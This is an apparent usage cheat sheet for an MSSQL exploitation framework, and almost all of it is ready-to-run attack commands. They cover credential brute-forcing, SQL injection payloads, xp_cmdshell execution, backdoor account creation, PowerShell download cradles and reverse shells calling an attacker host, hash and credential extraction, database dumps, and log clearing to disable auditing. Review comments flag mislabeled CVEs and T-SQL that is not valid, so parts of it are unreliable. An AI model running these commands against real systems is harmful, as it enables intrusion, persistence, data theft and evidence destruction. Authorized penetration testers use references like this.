
mssqlpwner

mssqlpwner is a comprehensive MSSQL exploitation and post-exploitation framework for security professionals conducting authorized penetration testing. It provides automated tools for discovering MSSQL instances, exploiting known vulnerabilities, executing queries, and establishing persistence. The tool integrates with Metasploit and supports both opportunistic and targeted attacks during authorized security assessments.

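# Install required packages (-y keeps the sequence non-interactive).
sudo apt-get update
sudo apt-get install -y python3 python3-pip git

# Install ODBC drivers for SQL Server.
# The repository signing key goes into apt's trusted.gpg.d directory instead of
# being piped into the deprecated `apt-key add`, and the source is taken from
# Microsoft's published prod.list: `apt-add-repository` with a bare URL does not
# yield a usable "deb" line and needs software-properties-common, which the
# first step never installs. Both downloads grant the repository full apt
# trust, so inspect them before running this on anything but a throwaway box.
curl -fsSL https://packages.microsoft.com/keys/microsoft.asc \
  | sudo tee /etc/apt/trusted.gpg.d/microsoft.asc >/dev/null
curl -fsSL https://packages.microsoft.com/config/ubuntu/20.04/prod.list \
  | sudo tee /etc/apt/sources.list.d/mssql-release.list >/dev/null
# apt only sees the new source after an update.
sudo apt-get update
# msodbcsql17/mssql-tools refuse to install unless the EULA is accepted.
sudo ACCEPT_EULA=Y apt-get install -y msodbcsql17 mssql-tools

# Add to PATH
export PATH="$PATH:/opt/mssql-tools/bin"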
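# Clone mssqlpwner
git clone https://github.com/blacklanternsecurity/mssqlpwner.git
# Abort if the clone failed rather than running pip from the wrong directory.
cd mssqlpwner || exit 1

# Install Python dependencies. `python3 -m pip` guarantees the packages land
# in the same interpreter that runs mssqlpwner.py below, which a bare `pip3`
# on a multi-Python host does not.
python3 -m pip install -r requirements.txt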
# Build the image from the Dockerfile in the checkout and tag it "mssqlpwner".
docker build --tag mssqlpwner .

# Start a throwaway interactive container (removed again on exit).
docker run --rm --interactive --tty mssqlpwner
# Local sanity checks: help, version and module list. None of these need a
# target or credentials, so they are safe to run before an engagement window.
# Display help
python3 mssqlpwner.py -h

# Show version
python3 mssqlpwner.py --version

# List available modules
python3 mssqlpwner.py --list-modules
| Parameter | Description | Example |
|---|---|---|
| `-s`, `--server` | MSSQL server hostname/IP | `-s 192.168.1.100` |
| `-u`, `--user` | Database username | `-u sa` |
| `-p`, `--password` | Database password | `-p P@ssw0rd` |
| `-P`, `--port` | MSSQL port (default 1433) | `-P 1433` |
| `-d`, `--database` | Target database | `-d master` |
| `-i`, `--instance` | Named instance | `-i SQLEXPRESS` |
| `-A`, `--auth` | Authentication type | `-A windows` |
| `-e`, `--encrypt` | Encrypt connection | `-e` |
# Connection examples. A password given via -p is visible to every local user
# in `ps` output and is written to the shell history; prefer the config-file
# route (with restrictive file permissions) or a prompt if the tool offers one,
# and clear the history for the session afterwards.
# Connect with SQL authentication
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password

# Connect with Windows authentication
# Unquoted, bash collapses DOMAIN\\username to DOMAIN\username before the tool
# sees it; quote the argument if a literal double backslash is really wanted.
python3 mssqlpwner.py -s sqlserver.internal -u DOMAIN\\username -p password -A windows

# Connect to named instance
python3 mssqlpwner.py -s sqlserver.internal -i SQLEXPRESS -u sa -p password

# Connection with specific database
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -d master
# Discovery: subnet-wide and per-host instance enumeration. The UDP variant
# presumably queries the SQL Server Browser service (UDP 1434) — confirm in the
# module source; --aggressive is not described on this page and should be
# assumed to send more probes and be noisier on the network.
# Scan for MSSQL instances on network
python3 mssqlpwner.py --scan 192.168.1.0/24

# Enumerate instances on specific host
python3 mssqlpwner.py --enumerate-instances 192.168.1.100

# UDP broadcast for SQL Server instances
python3 mssqlpwner.py --udp-scan 192.168.1.0/24

# Aggressive scanning
python3 mssqlpwner.py --scan 192.168.1.0/24 --aggressive
# Authenticated enumeration modules (catalog reads, presumably read-only).
# Get SQL Server version
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_version

# Enumerate databases
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_databases

# List tables in database
# No -d is given here, so this presumably lists the login's default database;
# add -d to target a specific one (see the -d example further down).
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_tables

# Get database users
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_users

# Enumerate SQL Server roles
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_roles

# Get login permissions
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_permissions
# Deeper enumeration. The last example runs without -u/-p and tries logins on
# its own; each failed attempt normally produces a failed-login entry in the
# SQL Server error log, so it is not a quiet check.
# Detailed database information
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -d master -m enum_database_info

# Find linked servers
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_linked_servers

# Enumerate triggers
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_triggers

# Find stored procedures
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m enum_procedures

# Identify default/weak credentials
python3 mssqlpwner.py -s 192.168.1.100 -m test_default_creds
# SQL-injection modules. All of them run over an already authenticated
# connection (-u/-p), so "injection" here presumably targets stored procedures
# or parameters inside the instance rather than a web front end — confirm in
# the module documentation before reporting findings under that label.
# Basic SQL injection test
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m test_sqli

# Exploit UNION-based SQLi
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m sqli_union \
  --target-column 3 --target-table users

# Blind SQL injection
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m sqli_blind \
  --payload "' OR 1=1 --"

# Time-based blind injection
# --delay is the per-request wait in seconds for this module; the same flag
# name is used as a pacing option in the OPSEC section at the bottom.
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m sqli_time \
  --delay 5
# Credential guessing. Every failed attempt is normally logged by SQL Server
# and, for Windows-authenticated accounts, counts toward the domain lockout
# threshold — size wordlists accordingly and agree lockout handling up front.
# Dictionary attack
python3 mssqlpwner.py -s 192.168.1.100 -u sa -m bruteforce \
  --wordlist passwords.txt

# Common credentials
python3 mssqlpwner.py -s 192.168.1.100 -m common_credentials

# Null password attack (empty string passed explicitly as the password)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p "" -m test_null_password

# SA account exploitation
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p sa -m test_default_sa
# CVE-specific modules. The labels on these examples do not all line up with
# the module names, so check --list-cve-exploits before trusting a label.
# MS17-010 (EternalBlue)
# NOTE(review): MS17-010 is an SMB bulletin rather than a SQL Server one, and
# the module id below does not look like that bulletin's CVE ids — confirm what
# this module actually tests before citing it.
python3 mssqlpwner.py -s 192.168.1.100 -m cve_2017_0010

# CVE-2019-0604 (SQL Server RCE)
# NOTE(review): CVE-2019-0604 is commonly catalogued as a SharePoint issue, not
# SQL Server — verify against the module's own description.
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m cve_2019_0604

# CVE-2020-0618 (Reporting Services)
python3 mssqlpwner.py -s 192.168.1.100 -m cve_2020_0618

# List available CVE exploits
python3 mssqlpwner.py --list-cve-exploits
# Ad-hoc T-SQL execution. Bash double quotes are safe for these examples only
# because the queries contain no $, backtick or double quote; queries with
# those characters need single quotes on the bash side (and doubled single
# quotes inside the T-SQL).
# Execute single query
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "SELECT @@VERSION"

# Execute from file
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  --query-file queries.sql

# Multiple queries (one batch, statements separated by ;)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "USE master; SELECT name FROM sysobjects WHERE xtype='U'"

# Interactive shell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password --shell
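-- Enumeration queries for an authenticated session. Comments use T-SQL `--`
-- so the batch can be pasted into a SQL client unchanged.
-- Get SQL Server configuration
SELECT @@VERSION;
-- fn_serverproperty() is not a SQL Server function; SERVERPROPERTY() takes one
-- fixed property name per call, so the commonly needed ones are listed.
SELECT SERVERPROPERTY('ProductVersion') AS product_version,
       SERVERPROPERTY('Edition') AS edition,
       SERVERPROPERTY('MachineName') AS machine_name;

-- List all SQL-authenticated logins (Windows logins are in sys.server_principals)
SELECT name FROM sys.sql_logins;

-- List database owners
SELECT name, suser_sname(owner_sid) AS Owner FROM sys.databases;

-- Find tables with sensitive data (name-based heuristic only)
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
  WHERE TABLE_NAME LIKE '%password%' OR TABLE_NAME LIKE '%credential%';

-- List extended properties. This does NOT return connection strings; it only
-- surfaces descriptive metadata that administrators attached to objects.
SELECT name, value FROM sys.fn_listextendedproperty(null, null, null, null, null, null, null);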
# Privilege checks and escalation modules, run from a low-privileged login
# where the page shows one. The impersonate example presumably depends on an
# IMPERSONATE grant already existing for the current login — verify with
# check_privileges first.
# Check current user privileges
python3 mssqlpwner.py -s 192.168.1.100 -u limited_user -p password \
  -m check_privileges

# Impersonate users
python3 mssqlpwner.py -s 192.168.1.100 -u limited_user -p password \
  -m impersonate --target-user "DOMAIN\\admin"

# Exploit dbowner role
python3 mssqlpwner.py -s 192.168.1.100 -u dbowner_user -p password \
  -m escalate_dbowner

# Abuse sysadmin role
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m escalate_sysadmin
# xp_cmdshell. Enabling it is a server-wide sp_configure change that is
# typically recorded in the SQL Server error log and is a common detection
# trigger. The two -q examples create and elevate a local Windows account,
# which persists on the host until removed (see the cleanup section).
# Enable xp_cmdshell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m enable_xp_cmdshell

# Execute OS commands via xp_cmdshell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m xp_cmdshell -c "whoami"

# Create local user via SQL
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "EXEC xp_cmdshell 'net user backdoor P@ssw0rd /add'"

# Add user to administrators
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "EXEC xp_cmdshell 'net localgroup administrators backdoor /add'"
# Alternative OS command execution paths; every example runs as sa. The
# placeholders (attacker.com, shell.dll, ...base64...) must be replaced. The
# OLE automation line nests three quoting layers (bash, the tool's -c string,
# PowerShell), so keep it on one line exactly as written.
# xp_cmdshell (classic method)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_xpcmdshell -c "tasklist"

# OLE Automation Objects
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_ole_automation -c "powershell.exe -nop -w hidden -c 'IEX(New-Object System.Net.WebClient).DownloadString(\"http://attacker.com/shell.ps1\")'"

# CLR Assembly injection
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_clr --assembly shell.dll

# Agent job for command execution
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_agent_job -c "cmd.exe /c powershell -nop -w hidden -enc ...base64..."
# Reverse-shell helpers. 192.168.1.50:4444 and http://attacker.com/shell.ps1
# are the listener placeholders used throughout this page; keep them
# consistent across sections. The -q example embeds PowerShell inside a T-SQL
# string inside a bash double-quoted string, which is why the inner quotes are
# escaped and doubled — do not reformat it.
# Generate reverse shell payload
python3 mssqlpwner.py --generate-payload --type reverse_shell \
  --ip 192.168.1.50 --port 4444

# Execute reverse shell via SQL Server
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -q "EXEC xp_cmdshell 'powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString(\"\"http://attacker.com/shell.ps1\"\")\"'"

# Create agent job with reverse shell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_reverse_shell_job --ip 192.168.1.50 --port 4444
# Persistence modules. Each creates a durable server-side artifact (login,
# database user, startup procedure) that outlives the session; record exactly
# what was created so the cleanup section can reverse it.
# Create backdoor login
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_backdoor_login --login backdoor --password P@ssw0rd

# Create hidden database user
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_hidden_user --database master --user hidden_admin

# Create startup procedure (--command is a placeholder to be completed)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_startup_procedure --command "EXEC xp_cmdshell 'powershell -nop -w hidden -c ...'"

# Disable auditing (module disable_auditing; the same module is listed again
# in the anti-forensics section below)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m disable_auditing
# Scheduled SQL Agent job. Presumably requires the Agent service to be running
# on the target. --job-name may contain spaces because it is double-quoted;
# the --command value is a placeholder (-enc ...) that must be completed.
# Create scheduled agent job
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_scheduled_job \
  --job-name "Windows Update" \
  --command "cmd.exe /c powershell -nop -w hidden -enc ..." \
  --schedule "Daily" \
  --time "02:00"

# Create T-SQL job for persistence
-- NOTE(review): the CREATE PROCEDURE statement below is not valid T-SQL —
-- sp_add_job is an existing msdb procedure, not something to define — so only
-- the EXEC line would run. Jobs created this way appear in msdb.dbo.sysjobs,
-- which is where they should be inventoried before and after the engagement.
CREATE PROCEDURE sp_add_job @job_name='backdoor',
  @enabled=1;
EXEC msdb.dbo.sp_add_job @job_name='backdoor', @enabled=1;

# List SQL Agent jobs — run this before and after creating jobs so the delta
# is known for cleanup.
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m list_agent_jobs
# Create logon trigger. A logon trigger fires for every login, the operator's
# own included; if the callback command errors, logins can presumably start
# failing across the board, so test the command separately first.
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m create_logon_trigger \
  --command "EXEC xp_cmdshell 'callback.exe 192.168.1.50:4444'"

# DML trigger for persistence
-- NOTE(review): the statement below is not valid as written — the label says
-- DML but CREATE/ALTER/DROP are DDL events, and a catalog view is not a valid
-- ON target. Server-level triggers are visible in sys.server_triggers and
-- database-level ones in sys.triggers; both are worth auditing on any instance
-- that has had sysadmin-level access.
CREATE TRIGGER persistence_trigger
ON master.sys.server_triggers
FOR CREATE, ALTER, DROP
AS
EXEC xp_cmdshell 'C:\\Windows\\Temp\\callback.exe';
# Data export modules. Output files land in the current directory in
# plaintext; treat them as engagement evidence (restrict permissions, record
# a hash, delete per the retention agreement).
# Dump entire database
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -d company_db -m dump_database --output company_db.sql

# Selective table export
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m dump_table --table users --output users.csv

# Dump with sensitive data detection
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m dump_sensitive_data --output sensitive.csv
# Credential extraction. hashes.txt and connections.txt contain secret
# material and need the same handling as database dumps.
# Extract SQL Server password hashes
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m extract_password_hashes --output hashes.txt

# Get Windows credential manager data
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m extract_windows_credentials

# Dump connection strings
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m extract_connection_strings --output connections.txt
# File-system access through the SQL Server service account. Inside bash
# double quotes, \\ is reduced to a single backslash before the tool sees the
# path, so C:\\Windows\\... arrives as C:\Windows\... — intended here.
# Read local files via SQL Server
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m read_file --path "C:\\Windows\\System32\\drivers\\etc\\hosts"

# Write files from SQL Server (--content is a placeholder)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m write_file --content "malware code" --output "C:\\Windows\\Temp\\backdoor.ps1"

# Enumerate accessible file shares
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m enumerate_file_shares
# Linked-server pivoting. Commands sent through a link run under whatever
# login the link maps to on the remote side, so the effective privilege level
# is set by the link configuration, not by the local sa login.
# Enumerate linked servers (same module as in the enumeration section)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m enum_linked_servers

# Query through linked server
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m query_linked_server --server "linked_server_name" \
  --query "SELECT @@VERSION"

# Execute command on linked server
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m exec_linked_server --server "remote_sql" \
  --command "EXEC xp_cmdshell 'whoami'"

# Chain exploitation through linked servers
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m linked_server_chain --target "internal_sql_server" \
  --command "CREATE LOGIN backdoor WITH PASSWORD='P@ssw0rd'"
# Identify database links (the tool-driven equivalent of the catalog queries
# that follow).
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m enum_db_links

# Execute query on linked database
-- OPENQUERY sends the string to the linked server and returns its rowset.
SELECT * FROM OPENQUERY(linked_server, 'SELECT @@VERSION');

# RPC to linked server
-- EXEC ... AT needs "RPC Out" enabled on the link (sys.servers.is_rpc_out_enabled);
-- links that have it enabled and map to a privileged remote login are the ones
-- to review first when hardening.
EXEC ('EXEC xp_cmdshell "whoami"') AT linked_server;
# Anti-forensics modules. Clearing logs is itself a high-signal event —
# Windows records a "log cleared" entry (e.g. Security event 1102) — and
# engagement reporting normally needs the originals, so document rather than
# clear unless the rules of engagement explicitly cover it.
# Clear SQL Server error logs
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m clear_error_logs

# Disable audit trails (same module as in the persistence section)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m disable_auditing

# Clear Windows event logs
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m clear_windows_logs
# Cleanup. These reverse the artifacts created above; the local Windows
# account and trigger examples have no module here and must be removed by
# hand, so keep the creation log from the persistence section.
# Remove created logins
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m remove_backdoor_login --login backdoor

# Delete created jobs
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m remove_scheduled_jobs

# Revert xp_cmdshell
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  -m disable_xp_cmdshell
# mssqlpwner_config.yaml
# Batch-run definition: presumably each target is connected to in turn and
# every entry under `modules` is executed against it, with results written to
# the `output` file. The file holds plaintext credentials, so keep it out of
# version control and restrict it (e.g. chmod 600) for the engagement.
targets:
  - host: 192.168.1.100
    port: 1433
    username: sa
    password: P@ssw0rd
    instance: SQLEXPRESS

  - host: sqlserver.internal
    port: 1433
    # A backslash is literal in a YAML plain scalar, so DOMAIN\sqlservice needs
    # no escaping here (unlike the shell examples above).
    username: DOMAIN\sqlservice
    password: ServicePassword123
    auth_type: windows

# Note that this list enables xp_cmdshell on every target as a side effect.
modules:
  - name: enum_databases
  - name: enable_xp_cmdshell
  - name: xp_cmdshell
    command: whoami

output:
  format: csv
  file: results.csv
# Run every target/module combination from the config file non-interactively.
# Re-read the module list first: the example config above includes
# enable_xp_cmdshell, which changes server configuration on each target.
python3 mssqlpwner.py --config mssqlpwner_config.yaml --execute-all
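# Connectivity troubleshooting.
# Test connectivity
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password --test

# Verbose connection output
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -v

# Check firewall: attempt a plain TCP connect to the TDS port. telnet is often
# not installed and leaves an interactive session to escape from; bash's
# /dev/tcp gives a non-interactive check with a usable exit status
# (0 = handshake completed, non-zero = closed/filtered or timed out).
if timeout 5 bash -c 'exec 3<>/dev/tcp/192.168.1.100/1433'; then
  printf '%s\n' "1433/tcp reachable"
else
  printf '%s\n' "1433/tcp not reachable (closed, filtered or timed out)" >&2
fi

# Verify ODBC driver
odbcinst -j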
# Module troubleshooting. `module_name` is a placeholder for any name printed
# by --list-modules.
# List available modules
python3 mssqlpwner.py --list-modules

# Run with debug output
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password -m module_name --debug

# Check module requirements (runs locally, no target needed)
python3 mssqlpwner.py -m module_name --check-requirements
  • Use dedicated test database for queries
  • Minimize xp_cmdshell usage (monitored)
  • Avoid large data transfers during business hours
  • Use encrypted connections (TLS 1.2+)
  • Document all actions with timestamps
  • Schedule cleanup tasks in advance
  • Monitor for IDS/IPS alerts
  • Test in lab environment first
# OPSEC options.
# Use least-privilege account
python3 mssqlpwner.py -s 192.168.1.100 -u limited_user -p password

# Randomize execution timing
# NOTE(review): --delay here is a pacing option (seconds between actions,
# presumably), but the same flag is the wait time for the sqli_time module
# above — confirm the tool disambiguates by module before combining them.
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  --delay 300 --jitter 60

# Use indirect methods (linked servers, jobs)
# Instead of xp_cmdshell

# Obfuscate queries (long-form --query; -q is used elsewhere on this page)
python3 mssqlpwner.py -s 192.168.1.100 -u sa -p password \
  --obfuscate --query "SELECT * FROM users"

mssqlpwner is designed for authorized penetration testing and security assessments only. Unauthorized access to computer systems is illegal. Always obtain written authorization before testing any systems.